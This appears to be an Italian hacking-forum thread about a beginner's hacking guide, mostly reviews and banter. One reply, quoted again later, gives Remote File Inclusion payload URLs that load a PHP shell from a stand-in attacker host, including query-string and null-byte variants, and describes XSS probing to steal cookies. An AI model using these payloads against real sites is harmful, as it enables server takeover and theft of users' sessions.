Guida The Black Book of Infernet

Stato
Discussione chiusa ad ulteriori risposte.
Da bel nabbo quale sono e fui, lo stampai e rilegai ai tempi di infernet. E' un ottimo lavoro che definisce una buona scaletta per imparare.
Ai tempi non sapevo decisamente dove mettere le mani, e questo mi aiutò quanto meno a capire da dove iniziare.
Ce ne fossero di più come murdercode; nel senso che di queste bibbie se ne trovano in inglese e di documentazione italiana posso dire che in giro c'è poca roba, se non "la guida del buon lamer".
 
è qualcosa di non più valido, considerando che le blackdoors quando vengono scoperte, dopo qualche giorno o addirittura dopo qualche ora viene rilasciata la patch che aggiusta il bug.Circa un anno è stata scoperta una blackdoor nel protocollo IPSec di TCP, nel 2001 l'FBI ha contribuito allo sviluppo di questa blackdoor grazie a un infliltrato e solo ora si è scoperto il bug.Anche nel sistema RSA si dice che è diventato facile riuscire a decifrare una connessione criptata ma non si parla ancora di blackdoor.Le autorità cercheranno sempre di controllare il mondo, noi abbiamo il compito di acculturarci a tal punto di poter capire che cosa succede tra quello che usiamo e che facciamo.
 
Ultima modifica:
Bene bene,dopo il simposio e la repubblica di Platone(li ho appena letti) il libro di Murder ci sta a pennello xD no apparte gli scherzi,l'ho scaricato,ora gli do una bella lettura...penso che chi come me è ai primi approcci con i linguaggi informatici potrebbe essere utile...


Cosa SA un hacker:
• Un hacker SA di non sapere

Quindi socrate era un Hacker :asd:
 
questo cs serve in sostanza cs ce scritto?
risp sn nuovo....poo visto ke ci 6 kiedianke l'amicizia grz nn mi deludere ti prego pls
:rockomg:
 
Ultima modifica:
Su questo libro scritto da Stefano Novelli alias Murdercode,ci viene spiegata la struttura di vari attacchi informatici,ma non per sfruttarli attaccando altra gente,ma bensì per proteggerci da essi sapendo cosa rischiamo...scusate se mi sono espresso male ma ancora non l'ho potuto leggere bene,ho dato solo una piccola lettura alle pagine..
 
Questo libro non affronta l'argomento come si deve. Lo sconsiglio a tutti.Ho letto la parte dei DoS a pagina 26 e sono totalmente in disaccordo su quello che dice perchè in 2 pagine non ha saputo spiegare e semplificare la tematica dei denial of service in modo completo. Questo è un libro per i smanettoni, che vogliono solo una infarinatura di un po di tutto - ma che alla fine non imparano niente.
 
Non ho tanto tempo per farne uno completo. Ma se mi dici un capitolo che vuoi approfondire sono disposto a scrivere.
 
Io domani devo sostenere i primi due esami per il modulo Ecdl, ora non ho ancora avuto il tempo di leggerlo.
L'ho già stampato, sono 93 pagine, quando lo finisco mi segno i punti che vorrei approfondire e ti faccio sapere.(se sei disponibile ovviamente)
 
Italians vorrei un attimo approfittare della tua presenza (in senso buono ovviamente) per approfondire l'argomento RFI (remote file inclusion)...
Vorrei capire come è possibile l'individuazione di una variabile errata, solo tramite scanner o anche manualmente? Se si in che modo? (oltre al conoscere il linguaggio di programmazione usato)
Grazie :)
 
In pratica il Remote File Inclusion funziona solo grazie alle variabili non controllate, ad esempio: in una pagina PHP che include delle pagine dinamiche mediante delle variabili visibili:in questo codice è possibile includere qualsiasi cosa pur che parta da:esempio.it/?pagina=e quindi possiamo includere una php shell:esempio.it/?pagina=http://attaccante.tld/phpshell.txtMa è raro che un buon sito soffra degli RFI perchè infatti la vulnerabilità si risolve controllando ogni url con degli if, ifelse.. else..:if ($pagina == 1)include ('http://esempio.it/pagina1.php'); elseif ($pagina == 2)include ('http://esempio/pagina2.php'); else die('Errore 404'); Piu che RFI, parlerei dei Cross Site Script, XSS. Questa tipologia di attacco è molto frequente. Controllare una variabile è quasi ovvio ma spesso ci si dimentica di controllare l'input di un form.Per provare se il form di un sito è vulnerabile ai XSS basta inserire un frammento di codice, come questo: In caso si apre una finestra di alert con scritto "Vulnerabile ai XSS!" allora il sito è vulnerabile e quindi è possibile sfruttare questo errore di programmazione, per scovare cookie e ben altro.Tuttavia questi tipi di vulnerabilità vanno scoperti per tentativi. Prima di tutto, conoscere almeno il tipo di piattaforma del sito, se è un CMS come joomla, drupal wordpress.. o se è un forum come phpbb, ipb, vb.. se è possibile scoprire la versione della piattaforma e infine cercare tutti gli exploit noti per quella versione di quella piattaforma. Se non è aggiornata, si hanno molte probabilità di successo..Oppure, ci si puo affidare a scan di vulnerabilità come nikto, nessus... che effettueranno dei test provando a inviare piu di 10.000 richieste a file che hanno vulnerabilità conosciute, l'unico problema è che se il server del sito ha un firewall come mod_security, dopo qualche tentativo già si è bannati e quindi non si puo piu effettuare a pieno lo scan.è piu facile trovare delle vulnerabilità sulle piattaforme che su siti fatti da zero perchè la piattaforma è fatta da piu persone che non sono sempre allo stesso livello di competenze e i files e le funzioni della piattaforma sono moltissimi mentre un sito fatto da zero tende ad essere piu controllato perchè lo scopo finale sarà piu mirato.
 
In pratica il Remote File Inclusion funziona solo grazie alle variabili non controllate, ad esempio: in una pagina PHP che include delle pagine dinamiche mediante delle variabili visibili:in questo codice è possibile includere qualsiasi cosa pur che parta da:esempio.it/?pagina=e quindi possiamo includere una php shell:esempio.it/?pagina=http://attaccante.tld/phpshell.txtMa è raro che un buon sito soffra degli RFI perchè infatti la vulnerabilità si risolve controllando ogni url con degli if, ifelse.. else..:if ($pagina == 1)include ('http://esempio.it/pagina1.php'); elseif ($pagina == 2)include ('http://esempio/pagina2.php'); else die('Errore 404'); Piu che RFI, parlerei dei Cross Site Script, XSS. Questa tipologia di attacco è molto frequente. Controllare una variabile è quasi ovvio ma spesso ci si dimentica di controllare l'input di un form.Per provare se il form di un sito è vulnerabile ai XSS basta inserire un frammento di codice, come questo: In caso si apre una finestra di alert con scritto "Vulnerabile ai XSS!" allora il sito è vulnerabile e quindi è possibile sfruttare questo errore di programmazione, per scovare cookie e ben altro.Tuttavia questi tipi di vulnerabilità vanno scoperti per tentativi. Prima di tutto, conoscere almeno il tipo di piattaforma del sito, se è un CMS come joomla, drupal wordpress.. o se è un forum come phpbb, ipb, vb.. se è possibile scoprire la versione della piattaforma e infine cercare tutti gli exploit noti per quella versione di quella piattaforma. Se non è aggiornata, si hanno molte probabilità di successo..Oppure, ci si puo affidare a scan di vulnerabilità come nikto, nessus... che effettueranno dei test provando a inviare piu di 10.000 richieste a file che hanno vulnerabilità conosciute, l'unico problema è che se il server del sito ha un firewall come mod_security, dopo qualche tentativo già si è bannati e quindi non si puo piu effettuare a pieno lo scan.è piu facile trovare delle vulnerabilità sulle piattaforme che su siti fatti da zero perchè la piattaforma è fatta da piu persone che non sono sempre allo stesso livello di competenze e i files e le funzioni della piattaforma sono moltissimi mentre un sito fatto da zero tende ad essere piu controllato perchè lo scopo finale sarà piu mirato.
Aggiungo per le RFI che bisognerebbe aggiungere il punot di domanda:
esempio.it/?pagina=http://attaccante.tld/phpshell.txt?
oppure se non dovesse funzionare il null byte
esempio.it/?pagina=http://attaccante.tld/phpshell.txt?%00
 
adesso me lo leggo, grazie per averlo scritto se pensi che per un principiante come me non sia comprensibile e hai un altro libro da consigiarmi fammelo sapere
+1 meritato (è l'unica cosa che ti posso assegnare vista la situazione...)

Shark00
 
ma hai letto il libro prima di parlare? nelle prime pagine dice che "alcuni hacker usano anche linguaggi facili tipo vb.net" non continuo la frase...
se non sai di cosa si parla statene zitto ;)
 
quindi? questo non è un libro che tratta il vb lo ha accennato e basta :patt:
ma lol.... quindi uno non può neanche aiutarsi con vb.net perché te dici che non si può? mmm beh allora hai ragione!!! non mi degno nemmeno di risponderti cosi facendo non farei altro che accontentarti e provocare flame..... quindi ci si vede su inforge nabbo ;)
 
Stato
Discussione chiusa ad ulteriori risposte.